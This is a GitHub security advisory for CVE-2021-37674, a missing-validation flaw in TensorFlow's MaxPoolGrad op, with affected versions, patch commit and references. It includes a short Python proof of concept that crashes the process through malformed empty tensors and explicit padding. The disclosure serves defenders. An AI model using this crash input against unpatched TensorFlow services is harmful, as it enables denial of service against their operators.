GitHub Advisoryadvisory · PyPI
GHSA-7ghq-fvr3-pj2x Incomplete validation in `MaxPoolGrad`
MEDIUM
Official page ↗
- Aliases
- CVE-2021-37674
- Ecosystem
- PyPI
- Packages
- tensorflow, tensorflow-cpu, tensorflow-gpu
- Severity
- Moderate
- CVSS vector
- CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
- Weaknesses
- CWE-1284, CWE-20
- Reviewed
- 2021-08-24
Affected packages
• PyPI tensorflow: < 2.3.4 → fixed in 2.3.4
• PyPI tensorflow: >= 2.4.0, < 2.4.3 → fixed in 2.4.3
• PyPI tensorflow: >= 2.5.0, < 2.5.1 → fixed in 2.5.1
• PyPI tensorflow-cpu: < 2.3.4 → fixed in 2.3.4
• PyPI tensorflow-cpu: >= 2.4.0, < 2.4.3 → fixed in 2.4.3
• PyPI tensorflow-cpu: >= 2.5.0, < 2.5.1 → fixed in 2.5.1
• PyPI tensorflow-gpu: < 2.3.4 → fixed in 2.3.4
• PyPI tensorflow-gpu: >= 2.4.0, < 2.4.3 → fixed in 2.4.3
• PyPI tensorflow-gpu: >= 2.5.0, < 2.5.1 → fixed in 2.5.1
Description
Impact
An attacker can trigger a denial of service via a segmentation fault in `tf.raw_ops.MaxPoolGrad` caused by missing validation:
```python
import tensorflow as tf
tf.raw_ops.MaxPoolGrad(
orig_input = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32),
orig_output = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32),
grad = tf.constant([], shape=[3, 0, 0, 2], dtype=tf.float32),
ksize = [1, 16, 16, 1],
strides = [1, 16, 18, 1],
padding = "EXPLICIT",
explicit_paddings = [0, 0, 14, 3, 15, 5, 0, 0])
```
The implementation misses some validation for the `orig_input` and `orig_output` tensors.
The fixes for CVE-2021-29579 were incomplete.
Patches
We have patched the issue in GitHub commit 136b51f10903e044308cf77117c0ed9871350475.
The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Yakun Zhang of Baidu Security.
Related
Alias · CVE (1)
- CVE-2021-37674 TensorFlow is an end-to-end open source platform for machine learning. vulnerability
References
- https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7ghq-fvr3-pj2x web
- https://nvd.nist.gov/vuln/detail/CVE-2021-37674 advisory
- https://github.com/tensorflow/tensorflow/commit/136b51f10903e044308cf77117c0ed9871350475 web
- https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-587.yaml web
- https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-785.yaml web
- https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-296.yaml web
- https://github.com/tensorflow/tensorflow package
- https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-068.md web